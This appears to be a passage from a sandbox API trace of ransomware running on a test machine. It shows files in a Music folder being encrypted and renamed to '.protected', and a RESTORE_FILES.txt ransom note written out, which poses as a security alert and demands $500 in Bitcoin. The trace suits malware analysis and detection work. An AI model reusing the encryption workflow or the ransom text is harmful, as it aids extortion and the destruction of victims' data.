[0092.369] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\z9JVlpIKm.wav") returned 71 [0092.369] StrStrW (lpFirst="z9JVlpIKm.wav", lpSrch=".zip") returned 0x0 [0092.369] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.370] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.370] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, 
lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.371] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.371] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.371] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.371] CloseHandle (hObject=0xd4) returned 1 [0092.372] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\z9JVlpIKm.wav.protected") returned 81 [0092.372] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\z9JVlpIKm.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\z9jvlpikm.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\z9JVlpIKm.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\z9jvlpikm.wav.protected")) returned 1 [0092.372] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0092.372] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0092.372] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\RESTORE_FILES.txt") returned 75 [0092.372] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\restore_files.txt"), dwDesiredAccess=0x40000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.373] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0092.373] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0092.374] lstrlenA 
(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0092.374] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0092.374] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0092.374] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0092.374] CloseHandle (hObject=0xb4) returned 1 [0092.375] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.375] lstrcmpiW (lpString1="Mb251 AgjJO zNjct8JU.mp3", lpString2="Windows") returned -1 [0092.375] lstrcmpiW (lpString1="Mb251 AgjJO zNjct8JU.mp3", lpString2="Program Files") returned -1 [0092.375] lstrcmpiW (lpString1="Mb251 AgjJO zNjct8JU.mp3", lpString2="Program Files (x86)") returned -1 [0092.375] lstrcmpiW (lpString1="Mb251 AgjJO zNjct8JU.mp3", lpString2="$Recycle.bin") returned 1 [0092.375] lstrcmpiW 
(lpString1="Mb251 AgjJO zNjct8JU.mp3", lpString2="System Volume Information") returned -1 [0092.375] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Mb251 AgjJO zNjct8JU.mp3") returned 64 [0092.375] StrStrIW (lpFirst="Mb251 AgjJO zNjct8JU.mp3", lpSrch=".protected") returned 0x0 [0092.375] lstrcmpW (lpString1="Mb251 AgjJO zNjct8JU.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.375] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.375] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.375] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Mb251 AgjJO zNjct8JU.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mb251 agjjo znjct8ju.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.375] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Mb251 AgjJO zNjct8JU.mp3") returned 64 [0092.375] StrStrW (lpFirst="Mb251 AgjJO zNjct8JU.mp3", lpSrch=".txt") returned 0x0 [0092.375] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Mb251 AgjJO zNjct8JU.mp3") returned 64 [0092.375] StrStrW (lpFirst="Mb251 AgjJO zNjct8JU.mp3", lpSrch=".rar") returned 0x0 [0092.375] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Mb251 AgjJO zNjct8JU.mp3") returned 64 [0092.375] StrStrW (lpFirst="Mb251 AgjJO zNjct8JU.mp3", lpSrch=".zip") returned 0x0 [0092.375] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.376] SetFilePointerEx (in: 
hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.376] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.376] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.376] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.376] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.376] CloseHandle (hObject=0xb4) returned 1 [0092.377] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Mb251 AgjJO zNjct8JU.mp3.protected") returned 74 [0092.377] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Mb251 AgjJO zNjct8JU.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mb251 agjjo znjct8ju.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\Mb251 AgjJO zNjct8JU.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\mb251 agjjo znjct8ju.mp3.protected")) returned 1 [0092.377] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.377] lstrcmpiW (lpString1="QgFLUv.wav", lpString2="Windows") returned -1 [0092.377] lstrcmpiW (lpString1="QgFLUv.wav", lpString2="Program Files") returned 1 [0092.377] lstrcmpiW (lpString1="QgFLUv.wav", lpString2="Program Files (x86)") returned 1 [0092.377] 
lstrcmpiW (lpString1="QgFLUv.wav", lpString2="$Recycle.bin") returned 1 [0092.378] lstrcmpiW (lpString1="QgFLUv.wav", lpString2="System Volume Information") returned -1 [0092.378] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QgFLUv.wav") returned 50 [0092.378] StrStrIW (lpFirst="QgFLUv.wav", lpSrch=".protected") returned 0x0 [0092.378] lstrcmpW (lpString1="QgFLUv.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.378] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.378] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QgFLUv.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qgfluv.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.378] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QgFLUv.wav") returned 50 [0092.378] StrStrW (lpFirst="QgFLUv.wav", lpSrch=".txt") returned 0x0 [0092.378] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QgFLUv.wav") returned 50 [0092.378] StrStrW (lpFirst="QgFLUv.wav", lpSrch=".rar") returned 0x0 [0092.378] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QgFLUv.wav") returned 50 [0092.378] StrStrW (lpFirst="QgFLUv.wav", lpSrch=".zip") returned 0x0 [0092.378] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.379] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.379] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.379] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.379] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.379] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.379] CloseHandle (hObject=0xb4) returned 1 [0092.379] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QgFLUv.wav.protected") returned 60 [0092.379] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QgFLUv.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qgfluv.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QgFLUv.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\qgfluv.wav.protected")) returned 1 [0092.380] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.380] lstrcmpiW (lpString1="U-9jEHg7uBi.m4a", lpString2="Windows") returned -1 [0092.380] lstrcmpiW (lpString1="U-9jEHg7uBi.m4a", lpString2="Program Files") returned 1 [0092.380] lstrcmpiW (lpString1="U-9jEHg7uBi.m4a", lpString2="Program Files (x86)") returned 1 [0092.380] lstrcmpiW (lpString1="U-9jEHg7uBi.m4a", lpString2="$Recycle.bin") returned 1 [0092.380] lstrcmpiW 
(lpString1="U-9jEHg7uBi.m4a", lpString2="System Volume Information") returned 1 [0092.380] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\U-9jEHg7uBi.m4a") returned 55 [0092.380] StrStrIW (lpFirst="U-9jEHg7uBi.m4a", lpSrch=".protected") returned 0x0 [0092.380] lstrcmpW (lpString1="U-9jEHg7uBi.m4a", lpString2="RESTORE_FILES.txt") returned 1 [0092.380] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.380] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\U-9jEHg7uBi.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\u-9jehg7ubi.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\U-9jEHg7uBi.m4a") returned 55 [0092.380] StrStrW (lpFirst="U-9jEHg7uBi.m4a", lpSrch=".txt") returned 0x0 [0092.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\U-9jEHg7uBi.m4a") returned 55 [0092.380] StrStrW (lpFirst="U-9jEHg7uBi.m4a", lpSrch=".rar") returned 0x0 [0092.380] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\U-9jEHg7uBi.m4a") returned 55 [0092.380] StrStrW (lpFirst="U-9jEHg7uBi.m4a", lpSrch=".zip") returned 0x0 [0092.380] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.381] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0092.381] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.381] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.381] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.381] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.381] CloseHandle (hObject=0xb4) returned 1 [0092.381] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\U-9jEHg7uBi.m4a.protected") returned 65 [0092.381] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\U-9jEHg7uBi.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\u-9jehg7ubi.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\U-9jEHg7uBi.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\u-9jehg7ubi.m4a.protected")) returned 1 [0092.382] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0092.382] lstrcmpiW (lpString1="wokEkE8gfwA0WvaR - W.m4a", lpString2="Windows") returned 1 [0092.382] lstrcmpiW (lpString1="wokEkE8gfwA0WvaR - W.m4a", lpString2="Program Files") returned 1 [0092.382] lstrcmpiW (lpString1="wokEkE8gfwA0WvaR - W.m4a", lpString2="Program Files (x86)") returned 1 [0092.382] lstrcmpiW (lpString1="wokEkE8gfwA0WvaR - W.m4a", lpString2="$Recycle.bin") returned 1 [0092.382] 
lstrcmpiW (lpString1="wokEkE8gfwA0WvaR - W.m4a", lpString2="System Volume Information") returned 1 [0092.382] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wokEkE8gfwA0WvaR - W.m4a") returned 64 [0092.382] StrStrIW (lpFirst="wokEkE8gfwA0WvaR - W.m4a", lpSrch=".protected") returned 0x0 [0092.382] lstrcmpW (lpString1="wokEkE8gfwA0WvaR - W.m4a", lpString2="RESTORE_FILES.txt") returned 1 [0092.382] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0092.382] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0092.382] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wokEkE8gfwA0WvaR - W.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wokeke8gfwa0wvar - w.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0092.382] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wokEkE8gfwA0WvaR - W.m4a") returned 64 [0092.382] StrStrW (lpFirst="wokEkE8gfwA0WvaR - W.m4a", lpSrch=".txt") returned 0x0 [0092.382] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wokEkE8gfwA0WvaR - W.m4a") returned 64 [0092.382] StrStrW (lpFirst="wokEkE8gfwA0WvaR - W.m4a", lpSrch=".rar") returned 0x0 [0092.382] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wokEkE8gfwA0WvaR - W.m4a") returned 64 [0092.382] StrStrW (lpFirst="wokEkE8gfwA0WvaR - W.m4a", lpSrch=".zip") returned 0x0 [0092.382] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.383] SetFilePointerEx (in: 
hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.383] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0092.383] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.383] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0092.383] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0092.383] CloseHandle (hObject=0xb4) returned 1 [0092.383] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wokEkE8gfwA0WvaR - W.m4a.protected") returned 74 [0092.383] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wokEkE8gfwA0WvaR - W.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wokeke8gfwa0wvar - w.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\wokEkE8gfwA0WvaR - W.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\wokeke8gfwa0wvar - w.m4a.protected")) returned 1 [0092.384] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0092.384] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0092.384] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RESTORE_FILES.txt") returned 57 [0092.384] 
CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0092.384] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure 